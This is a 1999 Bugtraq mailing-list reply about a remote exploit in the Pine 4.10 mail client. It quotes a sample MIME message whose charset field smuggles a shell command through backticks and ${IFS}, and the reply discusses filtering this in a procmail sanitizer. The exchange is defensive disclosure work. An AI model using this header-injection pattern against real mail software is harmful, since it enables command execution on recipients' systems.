[9420] in bugtraq
Re: remote exploit on pine 4.10 - neverending story?
daemon@ATHENA.MIT.EDU (John D. Hardin)
Tue Feb 9 11:51:12 1999
Date: Mon, 8 Feb 1999 09:25:11 -0800
Reply-To: "John D. Hardin" <jhardin@WOLFENET.COM>
From: "John D. Hardin" <jhardin@WOLFENET.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.4.05.9902072346030.924-100000@nimue.ids.pl>
On Mon, 8 Feb 1999, Michal Zalewski wrote:
> Hmm, but take a look at this message:
>
> ************************** MIME MESSAGE FOLLOWS **************************
> From: Attacker <attacker@eleet.net>
> To: Victim <victim@somewhere.net>
> Subject: Happy birthday
> ...
> MIME-Version: 1.0
> Content-Type: MULTIPART/MIXED; BOUNDARY="8323328-235065145-918425607=:319"
>
> --8323328-235065145-918425607=:319
> Content-Type: TEXT/PLAIN; charset='US-ASCII'
>
> Make a wish...
>
> --8323328-235065145-918425607=:319
> Content-Type: TEXT/PLAIN; charset=``touch${IFS}ME``; name="logexec.c"
> Content-Transfer-Encoding: BASE64
> Content-Description: wish
> Content-Disposition: attachment; filename="wish.c"
>
> ...it could be your last.
> *************************** MIME MESSAGE ENDS ***************************
Okay, I have added `` -> " conversion to my procmail MIME sanitizer.
Michal, is that the only way to exploit this? Or should there be ` ->
' conversion as well?
See http://www.wolfenet.com/~jhardin/procmail-security.html for
details.
--
John Hardin KA7OHZ jhardin@wolfenet.com
pgpk -a finger://gonzo.wolfenet.com/jhardin PGP key ID: 0x41EA94F5
PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5 E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
Your mouse has moved. Windows NT must be restarted for the change
to take effect. Reboot now? [ OK ]
-----------------------------------------------------------------------
101 days until Star Wars episode I
